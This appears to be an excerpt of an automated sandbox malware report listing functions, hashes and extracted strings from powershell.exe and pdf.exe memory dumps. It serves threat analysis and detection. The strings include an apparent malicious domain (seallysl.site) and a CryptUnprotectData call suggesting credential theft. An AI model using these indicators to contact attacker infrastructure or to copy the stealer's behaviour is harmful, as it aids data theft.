Opcode ID: 1850a59d442bc2ef7c5057740f3e95f3b6a131602a282b9d82cc033246164863
Instruction ID: 1e9f786fdfb090481e89379288149c885110d789ab5c8bae5204a93e614af219
Opcode Fuzzy Hash: 1850a59d442bc2ef7c5057740f3e95f3b6a131602a282b9d82cc033246164863
Instruction Fuzzy Hash: 8EB18474E012099FDB54DFA9D980A9DFBF2FF88314F208629E419AB315DB34A945CF90

Function 079E4503 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

tP^q, xrefs: 079E4597
T}k, xrefs: 079E46E5
tP^q, xrefs: 079E458B
4'^q, xrefs: 079E4719

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: T}k$4'^q$tP^q$tP^q
API String ID: 0-1348696436
Opcode ID: 46f7f938293236c71924ddaee59f700e9577bac9227edae8d7ce0a624b201fb8
Instruction ID: f83d06b70c81999ca25f6e7bacf9604b2e13e0e19d047901f99d329e71ea8665
Opcode Fuzzy Hash: 46f7f938293236c71924ddaee59f700e9577bac9227edae8d7ce0a624b201fb8
Instruction Fuzzy Hash: 87517AF0B003858FCB268B588544B6ABBEEAF86718F14846AF5099F371DB32DC44C791

Function 079E2308 Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

piUk, xrefs: 079E2363
piUk, xrefs: 079E23A0
piUk, xrefs: 079E2416
piUk, xrefs: 079E23B0

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: piUk$piUk$piUk$piUk
API String ID: 0-3104514277
Opcode ID: 71d7ad7aa8b9c4d9daf8d90d75b4aa1aa1b77659907d055fb4f1c2b476736e80
Instruction ID: d2890e94056df5f804285711ff87d1797f794b3cdab94c6c947aad1dd74a3a15
Opcode Fuzzy Hash: 71d7ad7aa8b9c4d9daf8d90d75b4aa1aa1b77659907d055fb4f1c2b476736e80
Instruction Fuzzy Hash: BE5148B2A0030A9FDB258F6995016AEBBEDBF85315F04847AE8148B251EB31DD45CBA1

Function 079E1EF8 Relevance: 5.1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

Strings

tP^q, xrefs: 079E1FDF
4'^q, xrefs: 079E1F95
tP^q, xrefs: 079E1FEB
4'^q, xrefs: 079E1F89

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: b83e6039cbe18c75f2e1c7335aa71c3899e0adc6665d24ab41a59242d22dd035
Instruction ID: 0a33fcb27f88950241b72e2e24483d0b7cf85f64be9900fff1b3c8ffb02dea6b
Opcode Fuzzy Hash: b83e6039cbe18c75f2e1c7335aa71c3899e0adc6665d24ab41a59242d22dd035
Instruction Fuzzy Hash: 2E412871B4420A8FC7278B688505627FBBEEF86315F1889ABD5158F296CB72C845C3A1

Function 079E5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 079E5800
$^q, xrefs: 079E57F4
$^q, xrefs: 079E57C6
$^q, xrefs: 079E57AA

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 0eccbce996b33105748afa4260ddc8c4f6147b9e05a23a751c8b133c8d51d630
Instruction ID: e2f10870360f249f4dec594c436d796278f454f6be93b984b7a6d2f7a758b263
Opcode Fuzzy Hash: 0eccbce996b33105748afa4260ddc8c4f6147b9e05a23a751c8b133c8d51d630
Instruction Fuzzy Hash: 6E2179B170030A9BDB35596A8C00B27B7DE6BC171DF25883AE509CB395CD72D8548361

Function 079E032B Relevance: 5.0, Strings: 4, Instructions: 32COMMON

Download Yara Rule

Strings

$^q, xrefs: 079E035E
$^q, xrefs: 079E0352
4'^q, xrefs: 079E0373
4'^q, xrefs: 079E037F

Memory Dump Source

Source File: 00000002.00000002.1763697419.00000000079E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: a143a5eb5aa3de5d72127d4bd753734d34c7a9ad6325b2f029d27981b0f694b1
Instruction ID: ae8a03af2a63c515320ba8a44fd8939ff67aca35969654a18eecf7ea3e222dd5
Opcode Fuzzy Hash: a143a5eb5aa3de5d72127d4bd753734d34c7a9ad6325b2f029d27981b0f694b1
Instruction Fuzzy Hash: 4AF0E571F4021B87C63E656C262016A55DB6BC0A64B355D2FC0429F388CEA1CC8A439A

Analysis Process: powershell.exePID: 7540, Parent PID: 7424COMMON

Executed Functions

Function 07032308 Relevance: 10.6, Strings: 8, Instructions: 622COMMON

Download Yara Rule

Strings

piUk, xrefs: 07032416
piUk, xrefs: 070323A0
piUk, xrefs: 07032363
4'^q, xrefs: 07032619
4'^q, xrefs: 0703260D
piUk, xrefs: 07032582
piUk, xrefs: 070323B0
|,Wk, xrefs: 070325DB

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$piUk$piUk$piUk$piUk$piUk$|,Wk
API String ID: 0-2668787723
Opcode ID: a8e2d12af59b7ed2f37b2f947221a258f31c67883609496ab7b380cdb33ff592
Instruction ID: d6db41de1b555d558e82ee69d5fda88968211fb4f3355e414f0c9f1cfb8cf3cf
Opcode Fuzzy Hash: a8e2d12af59b7ed2f37b2f947221a258f31c67883609496ab7b380cdb33ff592
Instruction Fuzzy Hash: F22235B1B0020ADFDB648F69D5006AEBBEABF8A310F14867AE515CB351DB31DC45C7A1

Function 07033CE8 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ced3ad6d81458ce412f9e190512fd7fb76a9e9f01ef681ab59960b554400f8d
Instruction ID: a1f8549eebb912980ff67d079cd4928e251b737e191fd7cf465e71a5f39850b2
Opcode Fuzzy Hash: 4ced3ad6d81458ce412f9e190512fd7fb76a9e9f01ef681ab59960b554400f8d
Instruction Fuzzy Hash: 685139B1B042128FCB658BA8D941A6BFBEA9FC5314B1486B6D8018F391DB31EC45C7A1

Function 07033CD0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b561ab101bb20d4f9dd7f5a190f207d6a7b99dc40515fe557b0f4585d0bf6c6
Instruction ID: 3966b5574c89a5cd8fbbd6161ce1d3079717f015396a81b639dcad27daf1b32f
Opcode Fuzzy Hash: 0b561ab101bb20d4f9dd7f5a190f207d6a7b99dc40515fe557b0f4585d0bf6c6
Instruction Fuzzy Hash: D24129F0B04202DFCB658B64D981A6BFBFAAF80254F0547A5D8018F3A2C735EC85C7A1

Function 07033CCC Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adefa7f6ab8566bb8798b484764314f328a13767fcabfb6972969405849a4bea
Instruction ID: efc775db5d2d26c53551fb06f2f8c79e8ad6c4d10dd3af14a2eb4377dbb9ac20
Opcode Fuzzy Hash: adefa7f6ab8566bb8798b484764314f328a13767fcabfb6972969405849a4bea
Instruction Fuzzy Hash: 234116F1B14202DFCB648B54DA81A6AFBFAAF80254F0547A5D8018F3A1D735EC85C7A1

Function 070326F7 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 948af1b1fb4e6e5cd596a703ae8a899bf241f4f6b3731b12763157661cd6648e
Instruction ID: 12b4c567066b215c0d9c77a9a0378aa74e8567d0068f67f7da0e1c5c5363d693
Opcode Fuzzy Hash: 948af1b1fb4e6e5cd596a703ae8a899bf241f4f6b3731b12763157661cd6648e
Instruction Fuzzy Hash: 7F21B0F5A00216EFDB60CF59C545B6AB7F9BF45322F14C266E818DB250D334E988CBA1

Function 07032700 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a90656ba39d470670083d4078c42daa9e1380ec09620f9a4e7a184773d777aa
Instruction ID: 04356b185186b2c55f9877ecc6e793b27c923077572154aae781e42df15e4d4a
Opcode Fuzzy Hash: 9a90656ba39d470670083d4078c42daa9e1380ec09620f9a4e7a184773d777aa
Instruction Fuzzy Hash: 8321C1F5A00216DFDB60CF59C545B69B7E9BB45322F04C266E818CB250D334D948CBA1

Function 070328D0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b506fd9f9c13e69ae138f41a98b53b70ae2e86d60e1fe2ca65663a10e448c12
Instruction ID: 390e02535d2c9f823d55acd2f3e5f70953a893bfa243d4daea60480bebc9ffff
Opcode Fuzzy Hash: 8b506fd9f9c13e69ae138f41a98b53b70ae2e86d60e1fe2ca65663a10e448c12
Instruction Fuzzy Hash: D521C0F1A00306DFCB60CF55C841BAABBF9FF46220F0582A7D5548B211E3319845CBA2

Non-executed Functions

Function 07030FB7 Relevance: 11.4, Strings: 9, Instructions: 185COMMON

Download Yara Rule

Strings

$^q, xrefs: 07031229
$^q, xrefs: 07031044
$^q, xrefs: 07031081
$^q, xrefs: 07031253
fcq, xrefs: 070310A2
`Q^q, xrefs: 07031153
`Q^q, xrefs: 070310ED
tP^q, xrefs: 07031127
$^q, xrefs: 07031065

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2306644927
Opcode ID: 45d390aaefb561674d73b0878676f9a73b7829fccb44db050f88c5fbe0939751
Instruction ID: 3b7a375d21be2909028d7e7b711ca783526d12a0735c280fe6df1cf1cd075d0e
Opcode Fuzzy Hash: 45d390aaefb561674d73b0878676f9a73b7829fccb44db050f88c5fbe0939751
Instruction Fuzzy Hash: 0661CBB0A04A0EDFDB64CF04C944BAAB7FABB4D300F148665E8119B290C7B5DC94CBA1

Function 07031BE0 Relevance: 9.1, Strings: 7, Instructions: 387COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07031F89
tP^q, xrefs: 07031FDF
piUk, xrefs: 07031C73
4'^q, xrefs: 07031C92
4'^q, xrefs: 07031F95
4'^q, xrefs: 07031C86
tP^q, xrefs: 07031FEB

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$piUk$tP^q$tP^q
API String ID: 0-1557894964
Opcode ID: 42be664dcc4173cdc163977bf7a3bccd9b5db86d40fbc37369887658c003d176
Instruction ID: 885d0b36c33537998460e666d51640e1fd3c1f3eb668486ae593b3e6c0d89ce3
Opcode Fuzzy Hash: 42be664dcc4173cdc163977bf7a3bccd9b5db86d40fbc37369887658c003d176
Instruction Fuzzy Hash: 85D158B1B0460A8FC7248B69940466BFBFAAFCA310F148A7BD515CF355DB32D889C791

Function 07033928 Relevance: 8.9, Strings: 7, Instructions: 160COMMON

Download Yara Rule

Strings

$^q, xrefs: 0703393A
tP^q, xrefs: 070339A5
$^q, xrefs: 0703396C
tP^q, xrefs: 070339B1
$^q, xrefs: 07033960
4'^q, xrefs: 07033B35
4'^q, xrefs: 07033B29

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: 98e718c3db0ddb48eeaa0343144511c11486e60f7ce72b743cb99fa88a6af4f2
Instruction ID: 5e7bd115b07eaa1bec7054bf0cf11ac6c37e27f5b1aad73c0c25cc48d7aedb87
Opcode Fuzzy Hash: 98e718c3db0ddb48eeaa0343144511c11486e60f7ce72b743cb99fa88a6af4f2
Instruction Fuzzy Hash: F5518AB2704215CFC7284A68D88466AFBEAEFC5620F144BABD505CF361CA31CC44C791

Function 07034638 Relevance: 7.8, Strings: 6, Instructions: 266COMMON

Download Yara Rule

Strings

T}k, xrefs: 070346E5
DU}k, xrefs: 07034895
4'^q, xrefs: 07034719
4'^q, xrefs: 070348C9
4'^q, xrefs: 07034725
4'^q, xrefs: 070348D5

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: T}k$4'^q$4'^q$4'^q$4'^q$DU}k
API String ID: 0-2702477815
Opcode ID: 00b9dc287486efed6a80d61f5cae9d50bca7f488071ed02aff70cd442879e2d2
Instruction ID: 2c8f67552feacc3cd27316e5d07c0978451cfc9cc61198aa1d87db67156f06b2
Opcode Fuzzy Hash: 00b9dc287486efed6a80d61f5cae9d50bca7f488071ed02aff70cd442879e2d2
Instruction Fuzzy Hash: 259125B1B00289CFCB54CF68D54467EBBEAAFC6211B2586AAE405CF315DB32D845C792

Function 07030568 Relevance: 6.6, Strings: 5, Instructions: 398COMMON

Download Yara Rule

Strings

4'^q, xrefs: 070305F6
4'^q, xrefs: 07030962
fcq, xrefs: 0703094B
4'^q, xrefs: 070305EC
4'^q, xrefs: 0703096E

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: fcq$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2717029046
Opcode ID: a22067d3c49d1efdd4030ec362ebd8dde5f91eaf4d698c69afd3f5ae1edbcbca
Instruction ID: dd9b1bb823d053e5d38fa5a9657ba7be797ff2e346d06af10f16cb6927baec20
Opcode Fuzzy Hash: a22067d3c49d1efdd4030ec362ebd8dde5f91eaf4d698c69afd3f5ae1edbcbca
Instruction Fuzzy Hash: C6D112B0B053459FC7249B68D81076ABBE6AFC2311F1489BBD545CB352DE32DC46CBA1

Function 07033678 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

$^q, xrefs: 07033836
$^q, xrefs: 070337FF
$^q, xrefs: 0703382A
4'^q, xrefs: 0703372E
4'^q, xrefs: 07033722

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 85ff94b5dc849f6e6d29f12957c50a6247a29bc351660b7a7708cc7dc1a82627
Instruction ID: 5b6f81212d5b1bca1e8fea5755dddb577d6bece1228aad4031396c5d6a55308e
Opcode Fuzzy Hash: 85ff94b5dc849f6e6d29f12957c50a6247a29bc351660b7a7708cc7dc1a82627
Instruction Fuzzy Hash: 365117F17043069FC7748B69894076AFBEAAFC6622F248A6BD415CB351DB31C889C791

Function 07033F28 Relevance: 5.4, Strings: 4, Instructions: 394COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07034030
4'^q, xrefs: 07034026
4'^q, xrefs: 07034180
4'^q, xrefs: 0703418A

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: d11816eff91cad14df5c49df28ceb647c1fb378312453321719b3a26814f5f5f
Instruction ID: 057b3edc8c96378f6423bf670a79d41a554dd4cd190868f6fa360566f07bcd5c
Opcode Fuzzy Hash: d11816eff91cad14df5c49df28ceb647c1fb378312453321719b3a26814f5f5f
Instruction Fuzzy Hash: 4DD137B1B043859FCB648B68D90077ABBEAAFC2310F148A7AF815CF351DA32D845C791

Function 07030CE8 Relevance: 5.2, Strings: 4, Instructions: 222COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07030D80
4'^q, xrefs: 07030ED3
4'^q, xrefs: 07030EDF
tP^q, xrefs: 07030D74

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: 958ea93bf6547d3645905c9a5bf9b883ae7c7d6e09f21bdc1355aadaec4e7039
Instruction ID: 410da5cb21700e0676e3f89b70386093af76d0b61c4ee57406f814eee7c9249f
Opcode Fuzzy Hash: 958ea93bf6547d3645905c9a5bf9b883ae7c7d6e09f21bdc1355aadaec4e7039
Instruction Fuzzy Hash: 6C7165B1B013098FC7549B68D800A6ABBEBAFC6320F14C6BAD509CF251DB32EC45C791

Function 07033908 Relevance: 5.1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

$^q, xrefs: 0703393A
tP^q, xrefs: 070339A5
tP^q, xrefs: 070339B1
$^q, xrefs: 07033960

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q
API String ID: 0-263804196
Opcode ID: 7bf65cb2aa985c2efd7ffb10c9a55f48a96216b8590be8f6a7f357bda9392ac8
Instruction ID: e003d31ad07456216d2c67b1c2ab68726b870852828098a89e308414da68d229
Opcode Fuzzy Hash: 7bf65cb2aa985c2efd7ffb10c9a55f48a96216b8590be8f6a7f357bda9392ac8
Instruction Fuzzy Hash: DB315BB2708355DFC7149E29D88466AFFEDEF96621B1886ABD444CF362C632DC05C750

Function 07035798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 070357AA
$^q, xrefs: 070357C6
$^q, xrefs: 07035800
$^q, xrefs: 070357F4

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 2db28f8a2f037e1e91e0a760283f0c662bb0ee02ac7556fd85b93591094fbc24
Instruction ID: 53072dba317f6de7d874cddd3989be3dc8ebc0c8f9891867c0a8ecbb507031c2
Opcode Fuzzy Hash: 2db28f8a2f037e1e91e0a760283f0c662bb0ee02ac7556fd85b93591094fbc24
Instruction Fuzzy Hash: 9721B8F13003069BCB744A3E9C00B2BBBDEABC1712F248A3AA505DF3A5DD71D8148361

Function 07030308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$^q, xrefs: 07030352
4'^q, xrefs: 07030373
$^q, xrefs: 0703035E
4'^q, xrefs: 0703037F

Memory Dump Source

Source File: 00000004.00000002.1735944461.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7030000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: e4a5d2a6124a7f54713987c858858d391c9894bdc11f0d5a9e43e54b70818ba2
Instruction ID: e9928ee934f7ba6cd3ae423e1677b72643a0b4b9aa0139647a8c66b9f64dc63d
Opcode Fuzzy Hash: e4a5d2a6124a7f54713987c858858d391c9894bdc11f0d5a9e43e54b70818ba2
Instruction Fuzzy Hash: F3014EA1B4E3494FC32A162859201766FFF5FC391071A4597C040CF356CD198C0E83A7

Analysis Process: pdf.exePID: 7980, Parent PID: 7300COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.2%
Total number of Nodes:	177
Total number of Limit Nodes:	13

Executed Functions

Function 00040130 Relevance: 38.6, APIs: 2, Strings: 19, Instructions: 1884COMMON

Download Yara Rule

Strings

;:54, xrefs: 0004175C
;:54, xrefs: 00041805
K=C#, xrefs: 00040325
U`3, xrefs: 000402F9
T1S7, xrefs: 000412D5
f[zU, xrefs: 000415EA
seallysl.site, xrefs: 00040419, 00040BEF, 00040C2C, 0004137A
Noni, xrefs: 000415FF
F], xrefs: 00040AE0
`1d7, xrefs: 00040304
2370D74D7AE6F4173A5C3C467A8ED8F1, xrefs: 0004093E
#Tw, xrefs: 00040E4F
xr, xrefs: 00041273
J!G', xrefs: 00040330
{){/, xrefs: 00040346
{-S, xrefs: 00040351
d5h;, xrefs: 0004030F
V[, xrefs: 00040AE7
=i<o, xrefs: 0004015A

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: #Tw$2370D74D7AE6F4173A5C3C467A8ED8F1$;:54$;:54$=i<o$F]$J!G'$K=C#$Noni$T1S7$U`3$V[$`1d7$d5h;$f[zU$seallysl.site$xr${){/${-S
API String ID: 0-2012259137
Opcode ID: 3d26b4626f03172b860dcf06b6bd1b40c731f453ec29da6b87b65195bc8a4ab5
Instruction ID: 5252391a082e3e8adb70b9e275a8f3edb2842678b8196050b270f84b57874f42
Opcode Fuzzy Hash: 3d26b4626f03172b860dcf06b6bd1b40c731f453ec29da6b87b65195bc8a4ab5
Instruction Fuzzy Hash: C3D234B16047408FE3248F25D89176BBBE1FF86304F18856CE5DA9B392D779D846CB82

Function 0005EB60 Relevance: 25.6, APIs: 3, Strings: 10, Instructions: 2801COMMON

Download Yara Rule

Strings

34t, xrefs: 00060C57
"JZ, xrefs: 000600DD
'Rx/, xrefs: 0005F5FB
fjnr, xrefs: 0005F3C8
vNHF, xrefs: 0005F2F2
*JZ, xrefs: 00060113
kk, xrefs: 000609D6
syrh, xrefs: 00060234
ODIF, xrefs: 0005ECDA
Y?^i, xrefs: 0005EC80

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: "JZ$'Rx/$*JZ$34t$ODIF$Y?^i$fjnr$kk$syrh$vNHF
API String ID: 0-2617420629
Opcode ID: 9ea54b0174c1b2b01a02c9eb51a145a31bb66ad56c2c0500a2560a4d1d468007
Instruction ID: 7950f56f81f01eb45d05b88a3e387b60cc0095987f76492233bc9472f85c4f8f
Opcode Fuzzy Hash: 9ea54b0174c1b2b01a02c9eb51a145a31bb66ad56c2c0500a2560a4d1d468007
Instruction Fuzzy Hash: 1813F670504B818BE7358F35C4907B3BBE2AF57305F0889ADC5EB9B286D779A50ACB11

Function 0004011A Relevance: 24.5, APIs: 2, Strings: 11, Instructions: 1779COMMON

Download Yara Rule

Strings

;:54, xrefs: 0004175C
;:54, xrefs: 00041805
2370D74D7AE6F4173A5C3C467A8ED8F1, xrefs: 0004093E
T1S7, xrefs: 000412D5
f[zU, xrefs: 000415EA
seallysl.site, xrefs: 00040419, 00040BEF, 00040C2C, 0004137A
Noni, xrefs: 000415FF
#Tw, xrefs: 00040E4F
xr, xrefs: 00041273
F], xrefs: 00040AE0
V[, xrefs: 00040AE7

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: #Tw$2370D74D7AE6F4173A5C3C467A8ED8F1$;:54$;:54$F]$Noni$T1S7$V[$f[zU$seallysl.site$xr
API String ID: 0-4059727312
Opcode ID: e18f4546d764b4b271d781978f34fad3eb135ec20978245d96e15bb7e21dfe01
Instruction ID: 1f79a86ac8b268e82f395adc4053fd716a00e81dfaa564c5c40e7c66595a63f3
Opcode Fuzzy Hash: e18f4546d764b4b271d781978f34fad3eb135ec20978245d96e15bb7e21dfe01
Instruction Fuzzy Hash: 14C256B16047408FE3258F25D89176BBBF1FF86304F18856CE4869B792D77AE806CB91

Function 0004D5AF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 404
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0004D87D

Strings

r, xrefs: 0004D739
;:54, xrefs: 0004D5E1, 0004D5F8
J, xrefs: 0004D70E

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
